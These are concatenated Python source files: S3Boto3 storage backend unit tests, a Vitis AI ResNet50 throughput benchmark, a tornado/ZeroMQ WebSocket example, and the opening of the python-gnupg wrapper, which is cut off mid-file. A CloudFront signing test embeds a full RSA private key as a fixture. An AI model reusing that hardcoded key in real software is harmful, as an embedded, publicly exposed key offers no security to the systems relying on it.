self.assertEqual(path, "path/to/somewhere")
def test_clean_name_normalize(self):
"""
Test the normalization of _clean_name
"""
path = self.storage._clean_name("path/to/../somewhere")
self.assertEqual(path, "path/somewhere")
def test_clean_name_trailing_slash(self):
"""
Test the _clean_name when the path has a trailing slash
"""
path = self.storage._clean_name("path/to/somewhere/")
self.assertEqual(path, "path/to/somewhere/")
def test_clean_name_windows(self):
"""
        Test _clean_name when the path contains Windows-style backslashes
"""
path = self.storage._clean_name("path\\to\\somewhere")
self.assertEqual(path, "path/to/somewhere")
def test_pickle_with_bucket(self):
"""
Test that the storage can be pickled with a bucket attached
"""
# Ensure the bucket has been used
self.storage.bucket
self.assertIsNotNone(self.storage._bucket)
# Can't pickle MagicMock, but you can't pickle a real Bucket object either
p = pickle.dumps(self.storage)
new_storage = pickle.loads(p)
self.assertIsInstance(new_storage._connections, threading.local)
# Put the mock connection back in
new_storage._connections.connection = mock.MagicMock()
self.assertIsNone(new_storage._bucket)
new_storage.bucket
self.assertIsNotNone(new_storage._bucket)
def test_pickle_without_bucket(self):
"""
Test that the storage can be pickled, without a bucket instance
"""
# Can't pickle a threadlocal
p = pickle.dumps(self.storage)
new_storage = pickle.loads(p)
self.assertIsInstance(new_storage._connections, threading.local)
def test_storage_url_slashes(self):
"""
Test URL generation.
"""
self.storage.custom_domain = 'example.com'
# We expect no leading slashes in the path,
# and trailing slashes should be preserved.
self.assertEqual(self.storage.url(''), 'https://example.com/')
self.assertEqual(self.storage.url('path'), 'https://example.com/path')
self.assertEqual(self.storage.url('path/'), 'https://example.com/path/')
self.assertEqual(self.storage.url('path/1'), 'https://example.com/path/1')
self.assertEqual(self.storage.url('path/1/'), 'https://example.com/path/1/')
def test_storage_save(self):
"""
Test saving a file
"""
name = 'test_storage_save.txt'
content = ContentFile('new content')
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content,
ExtraArgs={
'ContentType': 'text/plain',
}
)
def test_storage_save_with_default_acl(self):
"""
Test saving a file with user defined ACL.
"""
name = 'test_storage_save.txt'
content = ContentFile('new content')
self.storage.default_acl = 'private'
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content,
ExtraArgs={
'ContentType': 'text/plain',
'ACL': 'private',
}
)
def test_storage_object_parameters_not_overwritten_by_default(self):
"""
Test saving a file with user defined ACL.
"""
name = 'test_storage_save.txt'
content = ContentFile('new content')
self.storage.default_acl = 'public-read'
self.storage.object_parameters = {'ACL': 'private'}
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content,
ExtraArgs={
'ContentType': 'text/plain',
'ACL': 'private',
}
)
def test_content_type(self):
"""
Test saving a file with a None content type.
"""
name = 'test_image.jpg'
content = ContentFile('data')
content.content_type = None
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content,
ExtraArgs={
'ContentType': 'image/jpeg',
}
)
def test_storage_save_gzipped(self):
"""
Test saving a gzipped file
"""
name = 'test_storage_save.gz'
content = ContentFile("I am gzip'd")
self.storage.save(name, content)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content,
ExtraArgs={
'ContentType': 'application/octet-stream',
'ContentEncoding': 'gzip',
}
)
def test_storage_save_gzip(self):
"""
Test saving a file with gzip enabled.
"""
self.storage.gzip = True
name = 'test_storage_save.css'
content = ContentFile("I should be gzip'd")
self.storage.save(name, content)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
mock.ANY,
ExtraArgs={
'ContentType': 'text/css',
'ContentEncoding': 'gzip',
}
)
args, kwargs = obj.upload_fileobj.call_args
content = args[0]
zfile = gzip.GzipFile(mode='rb', fileobj=content)
self.assertEqual(zfile.read(), b"I should be gzip'd")
def test_storage_save_gzip_twice(self):
"""
Test saving the same file content twice with gzip enabled.
"""
# Given
self.storage.gzip = True
name = 'test_storage_save.css'
content = ContentFile("I should be gzip'd")
# When
self.storage.save(name, content)
self.storage.save('test_storage_save_2.css', content)
# Then
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
mock.ANY,
ExtraArgs={
'ContentType': 'text/css',
'ContentEncoding': 'gzip',
}
)
args, kwargs = obj.upload_fileobj.call_args
content = args[0]
zfile = gzip.GzipFile(mode='rb', fileobj=content)
self.assertEqual(zfile.read(), b"I should be gzip'd")
def test_compress_content_len(self):
"""
Test that file returned by _compress_content() is readable.
"""
self.storage.gzip = True
content = ContentFile("I should be gzip'd")
content = self.storage._compress_content(content)
self.assertTrue(len(content.read()) > 0)
def test_storage_open_read_string(self):
"""
Test opening a file in "r" mode (ie reading as string, not bytes)
"""
name = 'test_open_read_string.txt'
content_str = self.storage.open(name, "r").read()
self.assertEqual(content_str, "")
def test_storage_open_write(self):
"""
Test opening a file in write mode
"""
name = 'test_open_for_writïng.txt'
content = 'new content'
# Set the encryption flag used for multipart uploads
self.storage.object_parameters = {
'ServerSideEncryption': 'AES256',
'StorageClass': 'REDUCED_REDUNDANCY',
'ACL': 'public-read',
}
file = self.storage.open(name, 'w')
self.storage.bucket.Object.assert_called_with(name)
obj = self.storage.bucket.Object.return_value
# Set the name of the mock object
obj.key = name
file.write(content)
obj.initiate_multipart_upload.assert_called_with(
ACL='public-read',
ContentType='text/plain',
ServerSideEncryption='AES256',
StorageClass='REDUCED_REDUNDANCY'
)
# Save the internal file before closing
multipart = obj.initiate_multipart_upload.return_value
multipart.parts.all.return_value = [mock.MagicMock(e_tag='123', part_number=1)]
file.close()
multipart.Part.assert_called_with(1)
part = multipart.Part.return_value
part.upload.assert_called_with(Body=content.encode())
multipart.complete.assert_called_once_with(
MultipartUpload={'Parts': [{'ETag': '123', 'PartNumber': 1}]})
def test_write_bytearray(self):
"""Test that bytearray write exactly (no extra "bytearray" from stringify)."""
name = "saved_file.bin"
content = bytearray(b"content")
file = self.storage.open(name, "wb")
obj = self.storage.bucket.Object.return_value
# Set the name of the mock object
obj.key = name
bytes_written = file.write(content)
self.assertEqual(len(content), bytes_written)
def test_storage_open_no_write(self):
"""
Test opening file in write mode and closing without writing.
A file should be created as by obj.put(...).
"""
name = 'test_open_no_write.txt'
# Set the encryption flag used for puts
self.storage.object_parameters = {
'ServerSideEncryption': 'AES256',
'StorageClass': 'REDUCED_REDUNDANCY',
}
file = self.storage.open(name, 'w')
self.storage.bucket.Object.assert_called_with(name)
obj = self.storage.bucket.Object.return_value
obj.load.side_effect = ClientError({'Error': {},
'ResponseMetadata': {'HTTPStatusCode': 404}},
'head_bucket')
# Set the name of the mock object
obj.key = name
# Save the internal file before closing
file.close()
obj.load.assert_called_once_with()
obj.put.assert_called_once_with(
Body=b"",
ContentType='text/plain',
ServerSideEncryption='AES256',
StorageClass='REDUCED_REDUNDANCY'
)
def test_storage_open_no_overwrite_existing(self):
"""
Test opening an existing file in write mode and closing without writing.
"""
name = 'test_open_no_overwrite_existing.txt'
# Set the encryption flag used for puts
self.storage.object_parameters = {
'ServerSideEncryption': 'AES256',
'StorageClass': 'REDUCED_REDUNDANCY',
}
file = self.storage.open(name, 'w')
self.storage.bucket.Object.assert_called_with(name)
obj = self.storage.bucket.Object.return_value
# Set the name of the mock object
obj.key = name
# Save the internal file before closing
file.close()
obj.load.assert_called_once_with()
obj.put.assert_not_called()
def test_storage_write_beyond_buffer_size(self):
"""
Test writing content that exceeds the buffer size
"""
name = 'test_open_for_writïng_beyond_buffer_size.txt'
# Set the encryption flag used for multipart uploads
self.storage.object_parameters = {
'ServerSideEncryption': 'AES256',
'StorageClass': 'REDUCED_REDUNDANCY',
}
file = self.storage.open(name, 'w')
self.storage.bucket.Object.assert_called_with(name)
obj = self.storage.bucket.Object.return_value
# Set the name of the mock object
obj.key = name
# Initiate the multipart upload
file.write('')
obj.initiate_multipart_upload.assert_called_with(
ContentType='text/plain',
ServerSideEncryption='AES256',
StorageClass='REDUCED_REDUNDANCY'
)
multipart = obj.initiate_multipart_upload.return_value
# Write content at least twice as long as the buffer size
written_content = ''
counter = 1
while len(written_content) < 2 * file.buffer_size:
content = 'hello, aws {counter}\n'.format(counter=counter)
# Write more than just a few bytes in each iteration to keep the
# test reasonably fast
content += '*' * int(file.buffer_size / 10)
file.write(content)
written_content += content
counter += 1
# Save the internal file before closing
multipart.parts.all.return_value = [
mock.MagicMock(e_tag='123', part_number=1),
mock.MagicMock(e_tag='456', part_number=2)
]
file.close()
self.assertListEqual(
multipart.Part.call_args_list,
[mock.call(1), mock.call(2)]
)
part = multipart.Part.return_value
uploaded_content = ''.join(
args_list[1]['Body'].decode()
for args_list in part.upload.call_args_list
)
self.assertEqual(uploaded_content, written_content)
multipart.complete.assert_called_once_with(
MultipartUpload={'Parts': [
{'ETag': '123', 'PartNumber': 1},
{'ETag': '456', 'PartNumber': 2},
]}
)
def test_storage_exists(self):
self.assertTrue(self.storage.exists("file.txt"))
self.storage.connection.meta.client.head_object.assert_called_with(
Bucket=self.storage.bucket_name,
Key="file.txt",
)
def test_storage_exists_false(self):
self.storage.connection.meta.client.head_object.side_effect = ClientError(
{'Error': {'Code': '404', 'Message': 'Not Found'}},
'HeadObject',
)
self.assertFalse(self.storage.exists("file.txt"))
self.storage.connection.meta.client.head_object.assert_called_with(
Bucket=self.storage.bucket_name,
Key='file.txt',
)
def test_storage_delete(self):
self.storage.delete("path/to/file.txt")
self.storage.bucket.Object.assert_called_with('path/to/file.txt')
self.storage.bucket.Object.return_value.delete.assert_called_with()
def test_storage_listdir_base(self):
# Files:
# some/path/1.txt
# 2.txt
# other/path/3.txt
# 4.txt
pages = [
{
'CommonPrefixes': [
{'Prefix': 'some'},
{'Prefix': 'other'},
],
'Contents': [
{'Key': '2.txt'},
{'Key': '4.txt'},
],
},
]
paginator = mock.MagicMock()
paginator.paginate.return_value = pages
self.storage._connections.connection.meta.client.get_paginator.return_value = paginator
dirs, files = self.storage.listdir('')
paginator.paginate.assert_called_with(Bucket=None, Delimiter='/', Prefix='')
self.assertEqual(dirs, ['some', 'other'])
self.assertEqual(files, ['2.txt', '4.txt'])
def test_storage_listdir_subdir(self):
# Files:
# some/path/1.txt
# some/2.txt
pages = [
{
'CommonPrefixes': [
{'Prefix': 'some/path'},
],
'Contents': [
{'Key': 'some/2.txt'},
],
},
]
paginator = mock.MagicMock()
paginator.paginate.return_value = pages
self.storage._connections.connection.meta.client.get_paginator.return_value = paginator
dirs, files = self.storage.listdir('some/')
paginator.paginate.assert_called_with(Bucket=None, Delimiter='/', Prefix='some/')
self.assertEqual(dirs, ['path'])
self.assertEqual(files, ['2.txt'])
def test_storage_size(self):
obj = self.storage.bucket.Object.return_value
obj.content_length = 4098
name = 'file.txt'
self.assertEqual(self.storage.size(name), obj.content_length)
def test_storage_mtime(self):
# Test both USE_TZ cases
for use_tz in (True, False):
with self.settings(USE_TZ=use_tz):
self._test_storage_mtime(use_tz)
def _test_storage_mtime(self, use_tz):
obj = self.storage.bucket.Object.return_value
obj.last_modified = datetime.now(utc)
name = 'file.txt'
self.assertFalse(
is_aware(self.storage.modified_time(name)),
'Naive datetime object expected from modified_time()'
)
self.assertIs(
settings.USE_TZ,
is_aware(self.storage.get_modified_time(name)),
'{} datetime object expected from get_modified_time() when USE_TZ={}'.format(
('Naive', 'Aware')[settings.USE_TZ],
settings.USE_TZ
)
)
def test_storage_url(self):
name = 'test_storage_size.txt'
url = 'http://aws.amazon.com/%s' % name
self.storage.bucket.meta.client.generate_presigned_url.return_value = url
self.storage.bucket.name = 'bucket'
self.assertEqual(self.storage.url(name), url)
self.storage.bucket.meta.client.generate_presigned_url.assert_called_with(
'get_object',
Params={'Bucket': self.storage.bucket.name, 'Key': name},
ExpiresIn=self.storage.querystring_expire,
HttpMethod=None,
)
custom_expire = 123
self.assertEqual(self.storage.url(name, expire=custom_expire), url)
self.storage.bucket.meta.client.generate_presigned_url.assert_called_with(
'get_object',
Params={'Bucket': self.storage.bucket.name, 'Key': name},
ExpiresIn=custom_expire,
HttpMethod=None,
)
custom_method = 'HEAD'
self.assertEqual(self.storage.url(name, http_method=custom_method), url)
self.storage.bucket.meta.client.generate_presigned_url.assert_called_with(
'get_object',
Params={'Bucket': self.storage.bucket.name, 'Key': name},
ExpiresIn=self.storage.querystring_expire,
HttpMethod=custom_method,
)
def test_storage_url_custom_domain_signed_urls(self):
key_id = 'test-key'
filename = 'file.txt'
pem = dedent(
'''\
-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgQCXVuwcMk+JmVSKuQ1K4dZx4Z1dEcRQgTlqvhAyljIpttXlZh2/
fD3GkJCiqfwEmo+cdNK/LFzRj/CX8Wz1z1lH2USONpG6sAkotkatCbejiItDu5y6
janGJHfuWXu6B/o9gwZylU1gIsePY3lLNk+r9QhXUO4jXw6zLJftVwKPhQIDAQAB
AoGAbpkRV9HUmoQ5al+uPSkp5HOy4s8XHpYxdbaMc8ubwSxiyJCF8OhE5RXE/Xso
N90UUox1b0xmUKfWddPzgvgTD/Ub7D6Ukf+nVWDX60tWgNxICAUHptGL3tWweaAy
H+0+vZ0TzvTt9r00vW0FzO7F8X9/Rs1ntDRLtF3RCCxdq0kCQQDHFu+t811lCvy/
67rMEKGvNsNNSTrzOrNr3PqUrCnOrzKazjFVjsKv5VzI/U+rXGYKWJsMpuCFiHZ3
DILUC09TAkEAwpm2S6MN6pzn9eY6pmhOxZ+GQGGRUkKZfC1GDxaRSRb8sKTjptYw
WSemJSxiDzdj3Po2hF0lbhkpJgUq6xnCxwJAZgHHfn5CLSJrDD7Q7/vZi/foK3JJ
BRTfl3Wa4pAvv5meuRjKyEakVBGV79lyd5+ZHNX3Y40hXunjoO3FHrZIxwJAdRzu
waxahrRxQOKSr20c4wAzWnGddIUSO9I/VHs/al5EKsbBHrnOlQkwizSfuwqZtfZ7
csNf8FeCFRiNELoLJwJAZxWBE2+8J9VW9AQ0SE7j4FyM/B8FvRhF5PLAAsw/OxHO
SxiFP7Ptdac1tm5H5zOqaqSHWphI19HNNilXKmxuCA==
-----END RSA PRIVATE KEY-----'''
).encode('ascii')
url = 'https://mock.cloudfront.net/file.txt'
signed_url = url + '?Expires=3600&Signature=DbqVgh3FHtttQxof214tSAVE8Nqn3Q4Ii7eR3iykbOqAPbV89HC3EB~0CWxarpLNtbfosS5LxiP5EutriM7E8uR4Gm~UVY-PFUjPcwqdnmAiKJF0EVs7koJcMR8MKDStuWfFKVUPJ8H7ORYTOrixyHBV2NOrpI6SN5UX6ctNM50_&Key-Pair-Id=test-key' # noqa
self.storage.custom_domain = "mock.cloudfront.net"
for pem_to_signer in (
s3boto3._use_cryptography_signer(),
s3boto3._use_rsa_signer()):
self.storage.cloudfront_signer = pem_to_signer(key_id, pem)
self.storage.querystring_auth = False
self.assertEqual(self.storage.url(filename), url)
self.storage.querystring_auth = True
with mock.patch('storages.backends.s3boto3.datetime') as mock_datetime:
mock_datetime.utcnow.return_value = datetime.utcfromtimestamp(0)
self.assertEqual(self.storage.url(filename), signed_url)
def test_generated_url_is_encoded(self):
self.storage.custom_domain = "mock.cloudfront.net"
filename = "whacky & filename.mp4"
url = self.storage.url(filename)
parsed_url = urlparse(url)
self.assertEqual(parsed_url.path,
"/whacky%20%26%20filename.mp4")
self.assertFalse(self.storage.bucket.meta.client.generate_presigned_url.called)
def test_special_characters(self):
self.storage.custom_domain = "mock.cloudfront.net"
name = "ãlöhâ.jpg"
content = ContentFile('new content')
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
url = self.storage.url(name)
parsed_url = urlparse(url)
self.assertEqual(parsed_url.path, "/%C3%A3l%C3%B6h%C3%A2.jpg")
def test_strip_signing_parameters(self):
expected = 'http://bucket.s3-aws-region.amazonaws.com/foo/bar'
self.assertEqual(self.storage._strip_signing_parameters(
'%s?X-Amz-Date=12345678&X-Amz-Signature=Signature' % expected), expected)
self.assertEqual(self.storage._strip_signing_parameters(
'%s?expires=12345678&signature=Signature' % expected), expected)
@skipIf(threading is None, 'Test requires threading')
def test_connection_threading(self):
connections = []
def thread_storage_connection():
connections.append(self.storage.connection)
for x in range(2):
t = threading.Thread(target=thread_storage_connection)
t.start()
t.join()
# Connection for each thread needs to be unique
self.assertIsNot(connections[0], connections[1])
def test_location_leading_slash(self):
msg = (
"S3Boto3Storage.location cannot begin with a leading slash. "
"Found '/'. Use '' instead."
)
with self.assertRaises(ImproperlyConfigured, msg=msg):
s3boto3.S3Boto3Storage(location='/')
def test_override_settings(self):
with override_settings(AWS_LOCATION='foo1'):
storage = s3boto3.S3Boto3Storage()
self.assertEqual(storage.location, 'foo1')
with override_settings(AWS_LOCATION='foo2'):
storage = s3boto3.S3Boto3Storage()
self.assertEqual(storage.location, 'foo2')
def test_override_class_variable(self):
class MyStorage1(s3boto3.S3Boto3Storage):
location = 'foo1'
storage = MyStorage1()
self.assertEqual(storage.location, 'foo1')
class MyStorage2(s3boto3.S3Boto3Storage):
location = 'foo2'
storage = MyStorage2()
self.assertEqual(storage.location, 'foo2')
def test_override_init_argument(self):
storage = s3boto3.S3Boto3Storage(location='foo1')
self.assertEqual(storage.location, 'foo1')
storage = s3boto3.S3Boto3Storage(location='foo2')
self.assertEqual(storage.location, 'foo2')
|
resnet50.py
|
'''
Copyright 2019 Xilinx Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from ctypes import *
import cv2
import numpy as np
import runner
import xir.graph
import pathlib
import xir.subgraph
import os
import input_fn
import math
import threading
import time
import sys
'''
Calculate softmax
data: data to be calculated
size: data size
return: softmax result
'''
def CPUCalcSoftmax(data,size):
sum=0.0
result = [0 for i in range(size)]
for i in range(size):
result[i] = math.exp(data[i])
sum +=result[i]
for i in range(size):
result[i] /=sum
return result
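# Worked example (illustrative, not part of the original script):
# CPUCalcSoftmax([1.0, 2.0, 3.0], 3) exponentiates each entry
# (~2.718, ~7.389, ~20.086, sum ~30.193) and normalizes, returning
# approximately [0.0900, 0.2447, 0.6652].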
def get_script_directory():
path = os.getcwd()
return path
'''
Get top-k results according to their probability
datain: softmax result data
filePath: path of the file that records the class label information
'''
def TopK(datain,size,filePath):
cnt=[i for i in range(size) ]
pair=zip(datain,cnt)
pair=sorted(pair,reverse=True)
softmax_new,cnt_new=zip(*pair)
fp=open(filePath, "r")
data1=fp.readlines()
fp.close()
for i in range(5):
flag=0
for line in data1:
if flag==cnt_new[i]:
print("Top[%d] %f %s" %(i, (softmax_new[i]),(line.strip)("\n")))
flag=flag+1
SCRIPT_DIR = get_script_directory()
calib_image_dir = SCRIPT_DIR + "/../images/"
IMAGE_WIDTH = 224
IMAGE_HEIGHT = 224
global threadnum
threadnum = 0
'''
run resnet50 with batch
dpu: dpu runner
img: imagelist to be run
cnt: threadnum
'''
def runResnet50(dpu,img,cnt):
"""get tensor"""
inputTensors = dpu.get_input_tensors()
outputTensors = dpu.get_output_tensors()
outputHeight = outputTensors[0].dims[1]
outputWidth = outputTensors[0].dims[2]
outputChannel = outputTensors[0].dims[3]
outputSize = outputHeight*outputWidth*outputChannel
softmax = np.empty(outputSize)
batchSize = inputTensors[0].dims[0]
n_of_images = len(img)
count = 0
while count < cnt:
runSize = batchSize
shapeIn = (runSize,) + tuple([inputTensors[0].dims[i] for i in range(inputTensors[0].ndim)][1:])
"""prepare batch input/output """
outputData = []
inputData = []
outputData.append(np.empty((runSize,outputHeight,outputWidth,outputChannel), dtype = np.float32, order = 'C'))
inputData.append(np.empty((shapeIn), dtype = np.float32, order = 'C'))
"""init input image to input buffer """
for j in range(runSize):
imageRun = inputData[0]
imageRun[j,...] = img[(count+j)% n_of_images].reshape(inputTensors[0].dims[1],inputTensors[0].dims[2],inputTensors[0].dims[3])
"""run with batch """
job_id = dpu.execute_async(inputData,outputData)
dpu.wait(job_id)
for j in range(len(outputData)):
outputData[j] = outputData[j].reshape(runSize, outputSize)
"""softmax calculate with batch """
"""Benchmark DPU FPS performance over Vitis AI APIs execute_async() and wait() """
"""Uncomment the following code snippet to include softmax calculation for model’s end-to-end FPS evaluation """
#for j in range(runSize):
# softmax = CPUCalcSoftmax(outputData[0][j], outputSize)
count = count + runSize
def get_subgraph (g):
sub = []
root = g.get_root_subgraph()
sub = [ s for s in root.children
if s.metadata.get_attr_str ("device") == "DPU"]
return sub
def main(argv):
global threadnum
listimage=os.listdir(calib_image_dir)
threadAll = []
threadnum = int(argv[1])
i = 0
global runTotall
runTotall = len(listimage)
g = xir.graph.Graph.deserialize(pathlib.Path(argv[2]))
subgraphs = get_subgraph (g)
assert len(subgraphs) == 1 # only one DPU kernel
all_dpu_runners = []
for i in range(int(threadnum)):
all_dpu_runners.append(runner.Runner(subgraphs[0], "run"))
"""image list to be run """
img = []
for i in range(runTotall):
path = os.path.join(calib_image_dir,listimage[i])
img.append(input_fn.preprocess_fn(path))
cnt = 360
"""run with batch """
time_start = time.time()
for i in range(int(threadnum)):
t1 = threading.Thread(target=runResnet50, args=(all_dpu_runners[i], img, cnt))
threadAll.append(t1)
for x in threadAll:
x.start()
for x in threadAll:
x.join()
time_end = time.time()
timetotal = time_end - time_start
total_frames = cnt*int(threadnum)
fps = float(total_frames / timetotal)
print("FPS=%.2f, total frames = %.2f , time=%.6f seconds" %(fps,total_frames, timetotal))
if __name__ == "__main__":
if len(sys.argv) != 3:
print("please input thread number and model file.")
else :
main(sys.argv)
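# Example invocation (illustrative; the .xmodel path is a placeholder):
#   python3 resnet50.py 4 /path/to/resnet50.xmodel
# argv[1] is the number of worker threads and argv[2] is the compiled model
# file that is deserialized via xir.graph.Graph.deserialize().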
|
tornadosrv.py
|
"""Async web request example with tornado.
Requests to localhost:8888 will be relayed via 0MQ to a slow responder,
who will take 1-5 seconds to respond. The tornado app will remain responsive
during this time, and when the worker replies, the web request will finish.
A '.' is printed every 100ms to demonstrate that the zmq request is not blocking
the event loop.
"""
import sys
import random
import threading
import time
import zmq
from zmq.eventloop import ioloop, zmqstream
"""
ioloop.install() must be called prior to instantiating *any* tornado objects,
and ideally before importing anything from tornado, just to be safe.
install() sets the singleton instance of tornado.ioloop.IOLoop with zmq's
IOLoop. If this is not done properly, multiple IOLoop instances may be
created, which will have the effect of some subset of handlers never being
called, because only one loop will be running.
"""
ioloop.install()
import tornado
from tornado import web
from tornado import websocket
class EchoWebSocket(websocket.WebSocketHandler):
def open(self):
print "WebSocket opened"
def on_message(self, message):
self.write_message(u"You said: " + message)
def on_close(self):
print "WebSocket closed"
import cPickle as pickle
def slow_responder():
"""thread for slowly responding to replies."""
ctx = zmq.Context.instance()
socket = ctx.socket(zmq.REP)
socket.linger = 0
socket.bind('tcp://127.0.0.1:5555')
i=0
while True:
msg = socket.recv()
print "\nworker received %r\n" % msg
time.sleep(random.randint(1,5))
socket.send(msg + " to you too, #%i" % i)
i+=1
def dot():
"""callback for showing that IOLoop is still responsive while we wait"""
sys.stdout.write('.')
sys.stdout.flush()
def printer(msg):
print (msg)
class TestHandler(web.RequestHandler):
@web.asynchronous
def get(self):
ctx = zmq.Context.instance()
s = ctx.socket(zmq.REQ)
s.connect('tcp://127.0.0.1:5555')
# send request to worker
s.send('hello')
loop = ioloop.IOLoop.instance()
self.stream = zmqstream.ZMQStream(s)
self.stream.on_recv(self.handle_reply)
def handle_reply(self, msg):
# finish web request with worker's reply
reply = msg[0]
print "\nfinishing with %r\n" % reply,
self.stream.close()
self.write(reply)
self.finish()
def main():
worker = threading.Thread(target=slow_responder)
worker.daemon=True
worker.start()
#application = web.Application([(r"/", TestHandler)])
application = web.Application([(r"/websocket", EchoWebSocket)])
beat = ioloop.PeriodicCallback(dot, 100)
beat.start()
application.listen(8888)
try:
ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
print ' Interrupted'
if __name__ == "__main__":
main()
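# How to try it (illustrative): run this script and connect a WebSocket client
# to ws://localhost:8888/websocket; the handler echoes back "You said: <message>".
# Re-enabling the commented-out TestHandler route instead demonstrates the
# non-blocking zmq request/reply round trip described in the module docstring.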
|
gnupg.py
|
""" A wrapper for the 'gpg' command::
Portions of this module are derived from A.M. Kuchling's well-designed
GPG.py, using Richard Jones' updated version 1.3, which can be found
in the pycrypto CVS repository on Sourceforge:
http://pycrypto.cvs.sourceforge.net/viewvc/pycrypto/gpg/GPG.py
This module is *not* forward-compatible with amk's; some of the
old interface has changed. For instance, since I've added decrypt
functionality, I elected to initialize with a 'gnupghome' argument
instead of 'keyring', so that gpg can find both the public and secret
keyrings. I've also altered some of the returned objects in order for
the caller to not have to know as much about the internals of the
result classes.
While the rest of ISconf is released under the GPL, I am releasing
this single file under the same terms that A.M. Kuchling used for
pycrypto.
Steve Traugott, stevegt@terraluna.org
Thu Jun 23 21:27:20 PDT 2005
This version of the module has been modified from Steve Traugott's version
(see http://trac.t7a.org/isconf/browser/trunk/lib/python/isconf/GPG.py) by
Vinay Sajip to make use of the subprocess module (Steve's version uses os.fork()
and so does not work on Windows). Renamed to gnupg.py to avoid confusion with
the previous versions.
Modifications Copyright (C) 2008-2018 Vinay Sajip. All rights reserved.
A unittest harness (test_gnupg.py) has also been added.
"""
__version__ = "0.4.3"
__author__ = "Vinay Sajip"
__date__ = "$13-Jun-2018 12:11:43$"
try:
from io import StringIO
except ImportError: # pragma: no cover
from cStringIO import StringIO
import codecs
import locale
import logging
import os
import re
import socket
from subprocess import Popen
from subprocess import PIPE
import sys
import threading
STARTUPINFO = None
if os.name == 'nt': # pragma: no cover
try:
from subprocess import STARTUPINFO, STARTF_USESHOWWINDOW, SW_HIDE
except ImportError:
STARTUPINFO = None
try:
import logging.NullHandler as NullHandler
except ImportError:
class NullHandler(logging.Handler):
def handle(self, record):
pass
try:
unicode
_py3k = False
string_types = basestring
text_type = unicode
except NameError:
_py3k = True
string_types = str
text_type = str
logger = logging.getLogger(__name__)
if not logger.handlers:
logger.addHandler(NullHandler())
# We use the test below because it works for Jython as well as CPython
if os.path.__name__ == 'ntpath': # pragma: no cover
# On Windows, we don't need shell quoting, other than worrying about
# paths with spaces in them.
def shell_quote(s):
return '"%s"' % s
else:
# Section copied from sarge
# This regex determines which shell input needs quoting
# because it may be unsafe
UNSAFE = re.compile(r'[^\w%+,./:=@-]')
def shell_quote(s):
"""
Quote text so that it is safe for Posix command shells.
For example, "*.py" would be converted to "'*.py'". If the text is
considered safe it is returned unquoted.
:param s: The value to quote
:type s: str (or unicode on 2.x)
:return: A safe version of the input, from the point of view of Posix
command shells
:rtype: The passed-in type
"""
if not isinstance(s, string_types): # pragma: no cover
raise TypeError('Expected string type, got %s' % type(s))
if not s:
result = "''"
elif not UNSAFE.search(s):
result = s
else:
result = "'%s'" % s.replace("'", r"'\''")
return result
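# Illustrative behaviour derived from the logic above (not from the library docs):
#   shell_quote('safe.txt')  -> safe.txt      (no unsafe characters, returned as-is)
#   shell_quote('*.py')      -> '*.py'        (quoted because of the glob character)
#   shell_quote("it's")      -> 'it'\''s'     (embedded single quote escaped)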
# end of sarge code
# Now that we use shell=False, we shouldn't need to quote arguments.
# Use no_quote instead of shell_quote to remind us of where quoting
# was needed. However, note that we still need, on 2.x, to encode any
# Unicode argument with the file system encoding - see Issue #41 and
# Python issue #1759845 ("subprocess.call fails with unicode strings in
# command line").
# Allows the encoding used to be overridden in special cases by setting
# this module attribute appropriately.
fsencoding = sys.getfilesystemencoding()
def no_quote(s):
if not _py3k and isinstance(s, text_type):
s = s.encode(fsencoding)
return s
def _copy_data(instream, outstream):
# Copy one stream to another
sent = 0
if hasattr(sys.stdin, 'encoding'):
enc = sys.stdin.encoding
else: # pragma: no cover
enc = 'ascii'
while True:
# See issue #39: read can fail when e.g. a text stream is provided
# for what is actually a binary file
try:
data = instream.read(1024)
except UnicodeError:
logger.warning('Exception occurred while reading', exc_info=1)
break
if not data:
break
sent += len(data)
# logger.debug("sending chunk (%d): %r", sent, data[:256])
try:
outstream.write(data)
except UnicodeError: # pragma: no cover
outstream.write(data.encode(enc))
except:
# Can sometimes get 'broken pipe' errors even when the data has all
# been sent
logger.exception('Error sending data')
break
try:
outstream.close()
except IOError: # pragma: no cover
logger.warning('Exception occurred while closing: ignored', exc_info=1)
logger.debug("closed output, %d bytes sent", sent)
def _threaded_copy_data(instream, outstream):
wr = threading.Thread(target=_copy_data, args=(instream, outstream))
wr.setDaemon(True)
logger.debug('data copier: %r, %r, %r', wr, instream, outstream)
wr.start()
return wr
def _write_passphrase(stream, passphrase, encoding):
passphrase = '%s\n' % passphrase
passphrase = passphrase.encode(encoding)
stream.write(passphrase)
logger.debug('Wrote passphrase')
def _is_sequence(instance):
return isinstance(instance, (list, tuple, set, frozenset))
def _make_memory_stream(s):
try:
from io import BytesIO
rv = BytesIO(s)
except ImportError: # pragma: no cover
rv = StringIO(s)
return rv
def _make_binary_stream(s, encoding):
if _py3k:
if isinstance(s, str):
s = s.encode(encoding)
else:
if type(s) is not str:
s = s.encode(encoding)
return _make_memory_stream(s)
class Verify(object):
"Handle status messages for --verify"
TRUST_UNDEFINED = 0
TRUST_NEVER = 1
TRUST_MARGINAL = 2
TRUST_FULLY = 3
TRUST_ULTIMATE = 4
TRUST_LEVELS = {
"TRUST_UNDEFINED" : TRUST_UNDEFINED,
"TRUST_NEVER" : TRUST_NEVER,
